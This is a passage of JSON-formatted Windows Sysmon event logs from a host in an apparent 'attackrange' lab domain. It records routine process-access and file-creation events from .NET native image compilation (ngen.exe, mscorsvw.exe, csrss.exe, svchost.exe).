32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7012,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.398\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-00101C930B00}\r\nTargetProcessId: 2924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.398","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-00101C930B00}","TargetProcessId":"2924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7013,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.398\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-00101C930B00}\r\nTargetProcessId: 2924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.398","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-00101C930B00}","TargetProcessId":"2924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7014,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-00101C930B00}\r\nTargetProcessId: 2924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-00101C930B00}","TargetProcessId":"2924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7015,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.788\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-00105C970B00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.788","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-00105C970B00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7016,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.788\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-00105C970B00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.788","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-00105C970B00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7017,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:06.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-00105C970B00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:06.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2232-5F25-0000-00105C970B00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7018,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:06.992\r\nProcessGuid: {41C8662E-2232-5F25-0000-00105C970B00}\r\nProcessId: 4160\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1040-0\\Microsoft.Activities.Build.dll\r\nCreationUtcTime: 2020-08-01 08:05:06.992","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:06.992","ProcessGuid":"{41C8662E-2232-5F25-0000-00105C970B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1040-0\\Microsoft.Activities.Build.dll","CreationUtcTime":"2020-08-01 08:05:06.992","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7019,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.023\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010A59C0B00}\r\nTargetProcessId: 2920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.023","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010A59C0B00}","TargetProcessId":"2920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7020,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.023\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010A59C0B00}\r\nTargetProcessId: 2920\r\nTargetImage: 